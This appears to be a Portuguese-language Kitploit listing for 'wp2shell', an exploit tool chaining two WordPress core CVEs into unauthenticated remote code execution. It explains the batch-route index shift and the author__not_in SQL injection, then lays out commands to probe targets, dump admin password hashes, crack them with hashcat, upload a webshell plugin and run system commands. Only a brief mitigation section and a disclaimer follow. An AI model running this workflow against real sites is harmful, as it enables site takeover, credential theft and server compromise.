Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
wp2shell — CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi) | Kitploit
Ferramentas/GitHubGitHub/ekomssavior/wp2shell
Quebra de SenhasGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubekomssavior/wp2shell

wp2shell

CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi)

Ver Repositório
8217há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

wp2shell por: ek0ms savi0r

Execução Remota de Código Não Autenticada para POC do WordPress Core (CVE-2026-63030 + CVE-2026-60137)

O exploit wp2shell para uma cadeia de vulnerabilidades críticas no núcleo do WordPress. Ele encadeia um bug de confusão de rota de lote (batch) da API REST com uma injeção de SQL em WP_Query para alcançar execução remota de código não autenticada em instalações WordPress vulneráveis.

DetalheInformações
CVEsCVE-2026-63030 (confusão de rota de lote REST) + CVE-2026-60137 (SQLi author__not_in)
AfetadosWordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
Corrigida6.9.5, 7.0.2
Autenticação NecessáriaNenhuma — não autenticado
CVSSCrítico (cadeia RCE)
Descoberto PorAdam Kues (Assetnote / Searchlight Cyber)
DependênciasPython 3.8+ — apenas biblioteca padrão

Como Funciona

O exploit encadeia dois bugs no núcleo do WordPress:

  1. CVE-2026-60137 — Injeção de SQL – Quando author__not_in é passado como uma string em vez de um array, o WordPress ignora a proteção de sanitização is_array() e interpola o valor bruto em uma cláusula SQL NOT IN (...).

  2. CVE-2026-63030 — Confusão de Rota de Lote (Batch) – O endpoint /wp-json/batch/v1 constrói arrays paralelos $matches e $validation. Uma sub-requisição malformada é anexada a $validation, mas não a $matches, causando um deslocamento de índice de +1. A sub-requisição i é despachada com o handler da sub-requisição i+1.

Combinadas: Uma requisição POST /wp/v2/posts contendo uma requisição interna GET /wp/v2/users com uma string author_exclude contorna tanto a lista de permissões de métodos quanto a sanitização de entrada. A string chega ao WP_Query como author__not_in e é interpolada no SQL — proporcionando injeção de SQL cega não autenticada.

A partir daí, a ferramenta pode:

  • Extrair o hash da senha do administrador
  • Autenticar como admin (uma vez que o hash seja quebrado)
  • Enviar um plugin malicioso
  • Executar comandos arbitrários do sistema

Recursos


Instalação

root@kitploit:~
git clone https://github.com/ekomsSavior/wp2shell.git
cd wp2shell
chmod +x wp2shell.py

Só isso. Nenhum pacote de terceiros é necessário.


Uso

root@kitploit:~
./wp2shell.py <url> [command] [options]

Modo Interativo (Baseado em Menu)

root@kitploit:~
./wp2shell.py http://target.com

Inicia um menu interativo com toda a funcionalidade disponível por meio de opções numeradas.

Comandos

check — Confirmar Vulnerabilidade (Seguro)

Executa uma sonda de atraso de tempo para confirmar a explorabilidade. Não lê dados e não altera nada.

root@kitploit:~
./wp2shell.py http://target.com check

read — Extrair Dados (Injeção de SQL Cega)

Extrai informações do banco de dados usando injeção de SQL cega baseada em tempo.

root@kitploit:~
# Server fingerprint (version, database, user)
./wp2shell.py http://target.com read

# Extract user logins and password hashes
./wp2shell.py http://target.com read --users

# Extract database name
./wp2shell.py http://target.com read --database

# Extract MySQL version
./wp2shell.py http://target.com read --version

# Custom SQL query
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — Execução Remota de Código

Requer credenciais de administrador válidas. A injeção de SQL pode recuperar o hash da senha, mas você deve fornecer a senha em texto puro recuperada.

root@kitploit:~
# Execute a single command
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# Execute a single command (short form)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

Opções


Exemplo de Fluxo de Trabalho

root@kitploit:~
# 1. Check if the target is vulnerable
./wp2shell.py https://example.com check

# 2. Extract admin password hashes
./wp2shell.py https://example.com read --users

# 3. Crack the hash offline (using hashcat, john, etc.)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. Execute a command with the recovered password
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

Versões Afetadas

BranchAfetadasCorrigida
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (apenas SQLi, sem RCE)6.8.6

Versões anteriores à 6.9.0 não são afetadas pela cadeia RCE completa.


Detecção e Mitigação

Para Defensores:

  • Atualize para 6.9.5, 7.0.2 ou versões posteriores imediatamente
  • Clientes do Cloudflare WAF são protegidos automaticamente
  • Clientes do Wordfence têm regras de firewall
  • Monitore requisições POST /wp-json/batch/v1 com corpos requests aninhados
  • Um 404 na rota de lote nem sempre significa "corrigido" — também pode significar que um WAF/CDN está bloqueando o acesso anônimo à API REST

Aviso Legal

Esta ferramenta é apenas para fins educacionais e de testes de segurança autorizados.


Créditos

  • Descoberta: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (SQLi): TF1T, dtro, haongo
  • CVE-2026-63030 (Confusão de rota de lote): Adam Kues

Para mais detalhes sobre a vulnerabilidade, consulte o blog de pesquisa do Searchlight Cyber.

Baixar ferramenta
RecursoDescrição
Verificação de VulnerabilidadeSonda segura de atraso de tempo — não lê dados, não altera nada
Extração de DadosInjeção de SQL cega com otimização de busca binária para extração eficiente
Despejo de Hash de UsuáriosExtrai hashes user_login e user_pass de wp_users
Execução Remota de CódigoAutentica como admin, envia um plugin webshell, executa comandos
Shell InterativoSessão persistente de execução de comandos
Saída em CoresFeedback visual claro para resultados de varredura
Sem DependênciasUsa apenas a biblioteca padrão do Python
OpçãoDescrição
--usersExtrai user_login e user_pass de wp_users
--databaseExtrai o nome do banco de dados atual
--versionExtrai a versão do MySQL
--query "SQL"Executa uma consulta SQL personalizada (extração cega)
--user USERNome de usuário admin para RCE
--password PASSSenha do admin para RCE (texto puro, recuperada via SQLi)
--cmd CMDComando a ser executado via webshell